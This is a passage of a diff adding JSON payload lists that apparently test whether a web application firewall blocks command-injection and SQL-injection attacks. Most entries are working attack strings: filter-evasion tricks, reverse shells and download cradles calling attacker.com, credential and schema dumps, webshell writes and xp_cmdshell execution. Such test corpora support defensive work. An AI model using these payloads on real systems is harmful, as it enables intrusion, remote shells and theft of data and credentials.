{"id":"rce-adv-004","payload":"&&id","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","and-chain"],"notes":"AND operator injection","expected_block":true},
|
|
6
|
+
{"id":"rce-adv-005","payload":"`id`","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","backtick","subshell"],"notes":"Backtick subshell","expected_block":true},
|
|
7
|
+
{"id":"rce-adv-006","payload":"$(id)","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","dollar-paren","subshell"],"notes":"Dollar-paren subshell","expected_block":true},
|
|
8
|
+
{"id":"rce-adv-007","payload":"%0aid","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","newline"],"notes":"Newline injection","expected_block":true},
|
|
9
|
+
{"id":"rce-adv-008","payload":"%0d%0aid","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","crlf"],"notes":"CRLF injection","expected_block":true},
|
|
10
|
+
{"id":"rce-adv-009","payload":"& whoami","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","background"],"notes":"Background operator","expected_block":true},
|
|
11
|
+
{"id":"rce-adv-010","payload":"| whoami","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","pipe"],"notes":"Pipe whoami","expected_block":true},
|
|
12
|
+
{"id":"rce-adv-011","payload":"a]||id;[","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","bracket-escape"],"notes":"Bracket syntax escape","expected_block":true},
|
|
13
|
+
{"id":"rce-adv-012","payload":"a]|id|[","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","bracket-pipe"],"notes":"Bracket pipe escape","expected_block":true},
|
|
14
|
+
{"id":"rce-adv-013","payload":";${IFS}id","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","ifs","evasion"],"notes":"IFS variable whitespace bypass","expected_block":true},
|
|
15
|
+
{"id":"rce-adv-014","payload":";{id}","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","brace-expansion"],"notes":"Brace expansion","expected_block":true},
|
|
16
|
+
{"id":"rce-adv-015","payload":"${IFS}id","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","ifs","variable"],"notes":"IFS as separator","expected_block":true},
|
|
17
|
+
{"id":"rce-adv-016","payload":"cat${IFS}/etc/passwd","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","ifs","file-read"],"notes":"IFS to read passwd","expected_block":true},
|
|
18
|
+
{"id":"rce-adv-017","payload":"cat$IFS/etc/passwd","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","ifs","file-read"],"notes":"IFS without braces","expected_block":true},
|
|
19
|
+
{"id":"rce-adv-018","payload":"cat%09/etc/passwd","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","tab","file-read"],"notes":"Tab separator","expected_block":true},
|
|
20
|
+
{"id":"rce-adv-019","payload":"cat%20/etc/passwd","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","space","file-read"],"notes":"URL encoded space","expected_block":true},
|
|
21
|
+
{"id":"rce-adv-020","payload":"cat</etc/passwd","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","redirect","file-read"],"notes":"Input redirect as arg","expected_block":true},
|
|
22
|
+
{"id":"rce-adv-021","payload":"c'a't /etc/passwd","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","quote-split","evasion"],"notes":"Single quote word splitting","expected_block":true},
|
|
23
|
+
{"id":"rce-adv-022","payload":"c\"a\"t /etc/passwd","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","dquote-split","evasion"],"notes":"Double quote word splitting","expected_block":true},
|
|
24
|
+
{"id":"rce-adv-023","payload":"c\\at /etc/passwd","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","backslash","evasion"],"notes":"Backslash in command name","expected_block":true},
|
|
25
|
+
{"id":"rce-adv-024","payload":"/???/??t /???/p??s??","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","glob","evasion"],"notes":"Glob pattern /bin/cat /etc/passwd","expected_block":true},
|
|
26
|
+
{"id":"rce-adv-025","payload":"/???/n? -e /???/b??h attacker.com 4444","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","glob","reverse-shell"],"notes":"Glob-based reverse shell","expected_block":true},
|
|
27
|
+
{"id":"rce-adv-026","payload":"$(printf '\\x69\\x64')","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","printf","hex"],"notes":"printf hex encoded id","expected_block":true},
|
|
28
|
+
{"id":"rce-adv-027","payload":"$(echo${IFS}'id'|${IFS}'bash')","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","echo-pipe","evasion"],"notes":"Echo pipe to bash","expected_block":true},
|
|
29
|
+
{"id":"rce-adv-028","payload":"echo${IFS}$(id)","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","nested-subshell"],"notes":"Nested subshell execution","expected_block":true},
|
|
30
|
+
{"id":"rce-adv-029","payload":"bash -c {echo,aWQ=}|{base64,-d}|bash","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","base64","brace"],"notes":"Base64 brace expansion","expected_block":true},
|
|
31
|
+
{"id":"rce-adv-030","payload":"echo aWQ= | base64 -d | bash","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","base64","pipe"],"notes":"Base64 decode pipe bash","expected_block":true},
|
|
32
|
+
{"id":"rce-adv-031","payload":"bash<<<$(base64 -d<<<aWQ=)","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","herestring","base64"],"notes":"Here-string base64 execution","expected_block":true},
|
|
33
|
+
{"id":"rce-adv-032","payload":"python -c 'import os;os.system(\"id\")'","category":"rce","method":"GET","severity_hint":"critical","tags":["python","os-system"],"notes":"Python os.system","expected_block":true},
|
|
34
|
+
{"id":"rce-adv-033","payload":"python3 -c 'import subprocess;subprocess.call([\"id\"])'","category":"rce","method":"GET","severity_hint":"critical","tags":["python","subprocess"],"notes":"Python subprocess.call","expected_block":true},
|
|
35
|
+
{"id":"rce-adv-034","payload":"perl -e 'system(\"id\")'","category":"rce","method":"GET","severity_hint":"critical","tags":["perl","system"],"notes":"Perl system call","expected_block":true},
|
|
36
|
+
{"id":"rce-adv-035","payload":"ruby -e '`id`'","category":"rce","method":"GET","severity_hint":"critical","tags":["ruby","backtick"],"notes":"Ruby backtick execution","expected_block":true},
|
|
37
|
+
{"id":"rce-adv-036","payload":"node -e 'require(\"child_process\").exec(\"id\")'","category":"rce","method":"GET","severity_hint":"critical","tags":["node","child-process"],"notes":"Node.js child_process","expected_block":true},
|
|
38
|
+
{"id":"rce-adv-037","payload":"php -r 'system(\"id\");'","category":"rce","method":"GET","severity_hint":"critical","tags":["php","system"],"notes":"PHP system call","expected_block":true},
|
|
39
|
+
{"id":"rce-adv-038","payload":"lua -e 'os.execute(\"id\")'","category":"rce","method":"GET","severity_hint":"critical","tags":["lua","os-execute"],"notes":"Lua os.execute","expected_block":true},
|
|
40
|
+
{"id":"rce-adv-039","payload":"& ping -c 5 attacker.com &","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","ping","oob"],"notes":"OOB via ping","expected_block":true},
|
|
41
|
+
{"id":"rce-adv-040","payload":"& nslookup attacker.com &","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","dns","oob"],"notes":"OOB via nslookup","expected_block":true},
|
|
42
|
+
{"id":"rce-adv-041","payload":"& curl http://attacker.com/$(whoami) &","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","curl","exfil"],"notes":"Curl data exfiltration","expected_block":true},
|
|
43
|
+
{"id":"rce-adv-042","payload":"& wget http://attacker.com/$(id) &","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","wget","exfil"],"notes":"Wget data exfiltration","expected_block":true},
|
|
44
|
+
{"id":"rce-adv-043","payload":"& dir","category":"rce","method":"GET","severity_hint":"critical","tags":["windows","dir"],"notes":"Windows dir command","expected_block":true},
|
|
45
|
+
{"id":"rce-adv-044","payload":"& type C:\\Windows\\win.ini","category":"rce","method":"GET","severity_hint":"critical","tags":["windows","type","file-read"],"notes":"Windows type file read","expected_block":true},
|
|
46
|
+
{"id":"rce-adv-045","payload":"| powershell -nop -c whoami","category":"rce","method":"GET","severity_hint":"critical","tags":["windows","powershell"],"notes":"PowerShell whoami","expected_block":true},
|
|
47
|
+
{"id":"rce-adv-046","payload":"| powershell -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/p')\"","category":"rce","method":"GET","severity_hint":"critical","tags":["windows","powershell","download-cradle"],"notes":"PowerShell download cradle","expected_block":true},
|
|
48
|
+
{"id":"rce-adv-047","payload":"| certutil -urlcache -split -f http://attacker.com/shell.exe C:\\temp\\shell.exe","category":"rce","method":"GET","severity_hint":"critical","tags":["windows","certutil","download"],"notes":"Certutil file download","expected_block":true},
|
|
49
|
+
{"id":"rce-adv-048","payload":"| bitsadmin /transfer job /download /priority high http://attacker.com/shell.exe C:\\temp\\shell.exe","category":"rce","method":"GET","severity_hint":"critical","tags":["windows","bitsadmin","download"],"notes":"BITS download","expected_block":true},
|
|
50
|
+
{"id":"rce-adv-049","payload":"& for /f %i in ('whoami') do nslookup %i.attacker.com","category":"rce","method":"GET","severity_hint":"critical","tags":["windows","for-loop","dns-exfil"],"notes":"Windows DNS exfiltration via for","expected_block":true},
|
|
51
|
+
{"id":"rce-adv-050","payload":"| set /a 1+1","category":"rce","method":"GET","severity_hint":"high","tags":["windows","arithmetic","probe"],"notes":"Windows arithmetic probe","expected_block":true},
|
|
52
|
+
{"id":"rce-adv-051","payload":"bash -i >& /dev/tcp/attacker.com/4444 0>&1","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","reverse-shell","bash"],"notes":"Bash TCP reverse shell","expected_block":true},
|
|
53
|
+
{"id":"rce-adv-052","payload":"python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"attacker.com\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","reverse-shell","python"],"notes":"Python reverse shell","expected_block":true},
|
|
54
|
+
{"id":"rce-adv-053","payload":"php -r '$sock=fsockopen(\"attacker.com\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","reverse-shell","php"],"notes":"PHP reverse shell","expected_block":true},
|
|
55
|
+
{"id":"rce-adv-054","payload":"ruby -rsocket -e 'f=TCPSocket.open(\"attacker.com\",4444).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","reverse-shell","ruby"],"notes":"Ruby reverse shell","expected_block":true},
|
|
56
|
+
{"id":"rce-adv-055","payload":"mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker.com 4444 >/tmp/f","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","reverse-shell","netcat","mkfifo"],"notes":"Netcat mkfifo reverse shell","expected_block":true},
|
|
57
|
+
{"id":"rce-adv-056","payload":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc attacker.com 4444 >/tmp/f","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","reverse-shell","netcat"],"notes":"Netcat reverse shell cleanup","expected_block":true},
|
|
58
|
+
{"id":"rce-adv-057","payload":"awk 'BEGIN {s = \"/inet/tcp/0/attacker.com/4444\"; while(1){printf \"> \" |& s; s |& getline c; if(c) while ((c |& getline) > 0) print $0 |& s; close(c)}}'","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","reverse-shell","awk"],"notes":"AWK reverse shell","expected_block":true},
|
|
59
|
+
{"id":"rce-adv-058","payload":"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9hdHRhY2tlci5jb20vNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","reverse-shell","base64","brace"],"notes":"Brace expansion base64 reverse shell","expected_block":true},
|
|
60
|
+
{"id":"rce-adv-059","payload":"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAYQB0AHQAYQBjAGsAZQByAC4AYwBvAG0AIgAsADQANAA0ADQAKQA=","category":"rce","method":"GET","severity_hint":"critical","tags":["windows","reverse-shell","powershell","base64"],"notes":"PowerShell base64 reverse shell","expected_block":true},
|
|
61
|
+
{"id":"rce-adv-060","payload":"powershell -nop -c \"$c=New-Object Net.Sockets.TCPClient('attacker.com',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}\"","category":"rce","method":"GET","severity_hint":"critical","tags":["windows","reverse-shell","powershell","full"],"notes":"Full PowerShell TCP reverse shell","expected_block":true}
|
|
62
|
+
]
|
|
@@ -0,0 +1,82 @@
|
|
|
1
|
+
[
|
|
2
|
+
{"id":"sqli-adv-001","payload":"' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mssql","enumeration"],"notes":"MSSQL CONVERT error extraction","expected_block":true},
|
|
3
|
+
{"id":"sqli-adv-002","payload":"' AND 1=1 ORDER BY 1--","category":"sqli","method":"GET","severity_hint":"high","tags":["union","column-enum"],"notes":"Column count enumeration","expected_block":true},
|
|
4
|
+
{"id":"sqli-adv-003","payload":"' ORDER BY 1,2,3,4,5,6,7,8,9,10--","category":"sqli","method":"GET","severity_hint":"high","tags":["union","column-enum"],"notes":"Multi-column ORDER BY","expected_block":true},
|
|
5
|
+
{"id":"sqli-adv-004","payload":"' UNION SELECT NULL,CONCAT(username,0x3a,password) FROM users--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","data-theft"],"notes":"Credential extraction via CONCAT","expected_block":true},
|
|
6
|
+
{"id":"sqli-adv-005","payload":"' UNION SELECT NULL,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","enumeration","mysql"],"notes":"MySQL schema dump","expected_block":true},
|
|
7
|
+
{"id":"sqli-adv-006","payload":"' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql"],"notes":"MySQL FLOOR error extraction","expected_block":true},
|
|
8
|
+
{"id":"sqli-adv-007","payload":"' AND GTID_SUBSET(CONCAT(0x7e,(SELECT user()),0x7e),1)--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql"],"notes":"MySQL GTID_SUBSET extraction","expected_block":true},
|
|
9
|
+
{"id":"sqli-adv-008","payload":"' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7e,version(),0x7e)) USING utf8)))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql"],"notes":"MySQL JSON_KEYS error","expected_block":true},
|
|
10
|
+
{"id":"sqli-adv-009","payload":"' AND ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2))x FROM (SELECT 1 UNION SELECT 2)a GROUP BY x LIMIT 1)--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql"],"notes":"MySQL ROW comparison error","expected_block":true},
|
|
11
|
+
{"id":"sqli-adv-010","payload":"' AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1))a)--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql"],"notes":"MySQL NAME_CONST error","expected_block":true},
|
|
12
|
+
{"id":"sqli-adv-011","payload":"';DECLARE @q VARCHAR(255);SET @q='\\\\attacker.com\\share';EXEC master.dbo.xp_dirtree @q--","category":"sqli","method":"GET","severity_hint":"critical","tags":["oob","mssql","dns"],"notes":"MSSQL OOB via xp_dirtree","expected_block":true},
|
|
13
|
+
{"id":"sqli-adv-012","payload":"' AND LOAD_FILE(CONCAT('\\\\\\\\',version(),'.attacker.com\\\\'))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["oob","mysql","dns"],"notes":"MySQL OOB via LOAD_FILE","expected_block":true},
|
|
14
|
+
{"id":"sqli-adv-013","payload":"' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--","category":"sqli","method":"GET","severity_hint":"critical","tags":["oob","oracle"],"notes":"Oracle OOB via UTL_HTTP","expected_block":true},
|
|
15
|
+
{"id":"sqli-adv-014","payload":"' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual)||'.attacker.com')--","category":"sqli","method":"GET","severity_hint":"critical","tags":["oob","oracle","dns"],"notes":"Oracle DNS exfil","expected_block":true},
|
|
16
|
+
{"id":"sqli-adv-015","payload":"' AND extractvalue(1,concat(0x7e,(SELECT @@global.version_compile_os)))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql"],"notes":"MySQL OS detection","expected_block":true},
|
|
17
|
+
{"id":"sqli-adv-016","payload":"'||(SELECT ''||dbms_pipe.receive_message(CHR(98)||CHR(98),5) FROM dual)||'","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","oracle"],"notes":"Oracle time-based blind","expected_block":true},
|
|
18
|
+
{"id":"sqli-adv-017","payload":"' AND (SELECT * FROM (SELECT SLEEP(5))a)='","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","mysql"],"notes":"MySQL conditional sleep","expected_block":true},
|
|
19
|
+
{"id":"sqli-adv-018","payload":"' AND BENCHMARK(10000000,SHA1('test'))--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","mysql"],"notes":"MySQL BENCHMARK delay","expected_block":true},
|
|
20
|
+
{"id":"sqli-adv-019","payload":"' AND IF(1=1,SLEEP(5),0)--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","mysql"],"notes":"MySQL IF conditional sleep","expected_block":true},
|
|
21
|
+
{"id":"sqli-adv-020","payload":"';SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","postgresql"],"notes":"PostgreSQL CASE WHEN delay","expected_block":true},
|
|
22
|
+
{"id":"sqli-adv-021","payload":"' AND 1=(SELECT 1 FROM pg_sleep(5))--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","postgresql"],"notes":"PostgreSQL subquery sleep","expected_block":true},
|
|
23
|
+
{"id":"sqli-adv-022","payload":"' AND 1=(SELECT 1 WHERE 1=1 AND GENERATE_SERIES(1,1000000))--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","postgresql"],"notes":"PostgreSQL compute delay","expected_block":true},
|
|
24
|
+
{"id":"sqli-adv-023","payload":"'||(SELECT x FROM GENERATE_SERIES(1,1000000) x)||'","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","postgresql"],"notes":"PostgreSQL concatenated delay","expected_block":true},
|
|
25
|
+
{"id":"sqli-adv-024","payload":"' UNION SELECT 1,LOAD_FILE('/etc/passwd'),3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","lfi","mysql"],"notes":"MySQL file read via UNION","expected_block":true},
|
|
26
|
+
{"id":"sqli-adv-025","payload":"' UNION SELECT 1,pg_read_file('/etc/passwd'),3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","lfi","postgresql"],"notes":"PostgreSQL file read","expected_block":true},
|
|
27
|
+
{"id":"sqli-adv-026","payload":"' INTO OUTFILE '/var/www/html/shell.php'--","category":"sqli","method":"GET","severity_hint":"critical","tags":["write","mysql","rce"],"notes":"MySQL file write","expected_block":true},
|
|
28
|
+
{"id":"sqli-adv-027","payload":"' UNION SELECT '<?php system([\"c\"]);?>',2 INTO OUTFILE '/var/www/html/cmd.php'--","category":"sqli","method":"GET","severity_hint":"critical","tags":["write","mysql","rce","webshell"],"notes":"MySQL webshell write","expected_block":true},
|
|
29
|
+
{"id":"sqli-adv-028","payload":"';COPY (SELECT '') TO PROGRAM 'id'--","category":"sqli","method":"GET","severity_hint":"critical","tags":["rce","postgresql"],"notes":"PostgreSQL COPY TO PROGRAM RCE","expected_block":true},
|
|
30
|
+
{"id":"sqli-adv-029","payload":"';CREATE OR REPLACE FUNCTION cmd(text) RETURNS void AS '\\$\\ os;os.system(args[0])\\$\\$' LANGUAGE plpythonu;SELECT cmd('id')--","category":"sqli","method":"GET","severity_hint":"critical","tags":["rce","postgresql"],"notes":"PostgreSQL PL/Python RCE","expected_block":true},
|
|
31
|
+
{"id":"sqli-adv-030","payload":"' HAVING 1=1--","category":"sqli","method":"GET","severity_hint":"high","tags":["error-based","enumeration"],"notes":"HAVING clause column enum","expected_block":true},
|
|
32
|
+
{"id":"sqli-adv-031","payload":"' GROUP BY columnnames HAVING 1=1--","category":"sqli","method":"GET","severity_hint":"high","tags":["error-based","enumeration"],"notes":"GROUP BY column enumeration","expected_block":true},
|
|
33
|
+
{"id":"sqli-adv-032","payload":"1;SELECT/**/IF(SUBSTR(@@version,1,1)='5',SLEEP(5),0)","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","mysql","inline-comment"],"notes":"Version fingerprint via sleep","expected_block":true},
|
|
34
|
+
{"id":"sqli-adv-033","payload":"' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","mysql","version-comment"],"notes":"MySQL version-conditional comments","expected_block":true},
|
|
35
|
+
{"id":"sqli-adv-034","payload":"' UnIoN SeLeCt 1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","case-variation"],"notes":"Alternating case UNION SELECT","expected_block":true},
|
|
36
|
+
{"id":"sqli-adv-035","payload":"' uni%6fn sel%65ct 1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","url-encoding"],"notes":"Partial URL encoding keywords","expected_block":true},
|
|
37
|
+
{"id":"sqli-adv-036","payload":"' UNION%0aSELECT%0a1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","newline"],"notes":"Newline between keywords","expected_block":true},
|
|
38
|
+
{"id":"sqli-adv-037","payload":"' UNION%09SELECT%091,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","tab"],"notes":"Tab between keywords","expected_block":true},
|
|
39
|
+
{"id":"sqli-adv-038","payload":"' UN/**/ION SE/**/LECT 1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","inline-comment"],"notes":"Keyword splitting via comments","expected_block":true},
|
|
40
|
+
{"id":"sqli-adv-039","payload":"' %55nion %53elect 1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","hex-encoding"],"notes":"Hex-encoded first char of keywords","expected_block":true},
|
|
41
|
+
{"id":"sqli-adv-040","payload":"' OR 1 IN (1)--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","alternative-syntax"],"notes":"IN operator instead of =","expected_block":true},
|
|
42
|
+
{"id":"sqli-adv-041","payload":"' OR 1 BETWEEN 0 AND 2--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","alternative-syntax"],"notes":"BETWEEN instead of =","expected_block":true},
|
|
43
|
+
{"id":"sqli-adv-042","payload":"' OR 1 LIKE 1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","alternative-syntax"],"notes":"LIKE instead of =","expected_block":true},
|
|
44
|
+
{"id":"sqli-adv-043","payload":"' OR 1 RLIKE 1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","alternative-syntax"],"notes":"RLIKE instead of =","expected_block":true},
|
|
45
|
+
{"id":"sqli-adv-044","payload":"' OR 1 REGEXP 1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","alternative-syntax"],"notes":"REGEXP instead of =","expected_block":true},
|
|
46
|
+
{"id":"sqli-adv-045","payload":"' OR 1 SOUNDS LIKE 1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","alternative-syntax","mysql"],"notes":"MySQL SOUNDS LIKE","expected_block":true},
|
|
47
|
+
{"id":"sqli-adv-046","payload":"' OR NOT 1>1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","alternative-syntax"],"notes":"NOT with GT comparison","expected_block":true},
|
|
48
|
+
{"id":"sqli-adv-047","payload":"' OR 1 IS NOT NULL--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","alternative-syntax"],"notes":"IS NOT NULL bypass","expected_block":true},
|
|
49
|
+
{"id":"sqli-adv-048","payload":"'-IF(1=1,1,0)='0","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","arithmetic"],"notes":"Arithmetic true via IF","expected_block":true},
|
|
50
|
+
{"id":"sqli-adv-049","payload":"'-(1)='0","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","arithmetic"],"notes":"Arithmetic injection","expected_block":true},
|
|
51
|
+
{"id":"sqli-adv-050","payload":"' DIV 0--","category":"sqli","method":"GET","severity_hint":"high","tags":["error-based","mysql"],"notes":"MySQL DIV zero error","expected_block":true},
|
|
52
|
+
{"id":"sqli-adv-051","payload":"' MOD 0--","category":"sqli","method":"GET","severity_hint":"high","tags":["error-based","mysql"],"notes":"MySQL MOD zero error","expected_block":true},
|
|
53
|
+
{"id":"sqli-adv-052","payload":"' XOR 1=1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","xor"],"notes":"XOR boolean logic","expected_block":true},
|
|
54
|
+
{"id":"sqli-adv-053","payload":"' AND NOT 1=2--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","boolean"],"notes":"Double negation boolean","expected_block":true},
|
|
55
|
+
{"id":"sqli-adv-054","payload":"' AND MID(@@version,1,1)='5'--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","mysql","fingerprint"],"notes":"MID version check","expected_block":true},
|
|
56
|
+
{"id":"sqli-adv-055","payload":"' AND ORD(MID((SELECT IFNULL(CAST(schema_name AS CHAR),0x20) FROM information_schema.schemata LIMIT 0,1),1,1))>64--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","mysql","binary-search"],"notes":"Binary search char extraction","expected_block":true},
|
|
57
|
+
{"id":"sqli-adv-056","payload":"' AND (SELECT LENGTH(database()))>0--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","mysql"],"notes":"Database name length check","expected_block":true},
|
|
58
|
+
{"id":"sqli-adv-057","payload":"' AND ASCII(SUBSTRING((SELECT database()),1,1))>64--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","mysql","binary-search"],"notes":"ASCII binary search extraction","expected_block":true},
|
|
59
|
+
{"id":"sqli-adv-058","payload":"' UNION SELECT NULL,table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","enumeration"],"notes":"Table enumeration with LIMIT offset","expected_block":true},
|
|
60
|
+
{"id":"sqli-adv-059","payload":"' UNION SELECT NULL,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","enumeration"],"notes":"Column enumeration","expected_block":true},
|
|
61
|
+
{"id":"sqli-adv-060","payload":"' UNION SELECT NULL,CONCAT_WS(0x3a,user,password,host) FROM mysql.user--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","mysql","credential-theft"],"notes":"MySQL user table dump","expected_block":true},
|
|
62
|
+
{"id":"sqli-adv-061","payload":"' OR EXISTS(SELECT 1 FROM information_schema.tables WHERE table_name REGEXP '^user')--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","enumeration","regexp"],"notes":"Table existence via REGEXP","expected_block":true},
|
|
63
|
+
{"id":"sqli-adv-062","payload":"' UNION SELECT string_agg(tablename,',') FROM pg_tables WHERE schemaname='public'--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","postgresql","enumeration"],"notes":"PostgreSQL pg_tables dump","expected_block":true},
|
|
64
|
+
{"id":"sqli-adv-063","payload":"' UNION SELECT listagg(table_name,',') WITHIN GROUP (ORDER BY table_name) FROM all_tables--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","oracle","enumeration"],"notes":"Oracle table enumeration","expected_block":true},
|
|
65
|
+
{"id":"sqli-adv-064","payload":"' AND (SELECT TOP 1 name FROM sysobjects WHERE xtype='U')='users'--","category":"sqli","method":"GET","severity_hint":"critical","tags":["blind","mssql","enumeration"],"notes":"MSSQL sysobjects table check","expected_block":true},
|
|
66
|
+
{"id":"sqli-adv-065","payload":"';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'whoami'--","category":"sqli","method":"GET","severity_hint":"critical","tags":["rce","mssql","stacked"],"notes":"MSSQL enable xp_cmdshell chain","expected_block":true},
|
|
67
|
+
{"id":"sqli-adv-066","payload":"';EXEC master..xp_cmdshell 'powershell -nop -c \"IEX(New-Object Net.WebClient).DownloadString(''http://attacker.com/p'')\"'--","category":"sqli","method":"GET","severity_hint":"critical","tags":["rce","mssql","powershell"],"notes":"MSSQL PowerShell download cradle","expected_block":true},
|
|
68
|
+
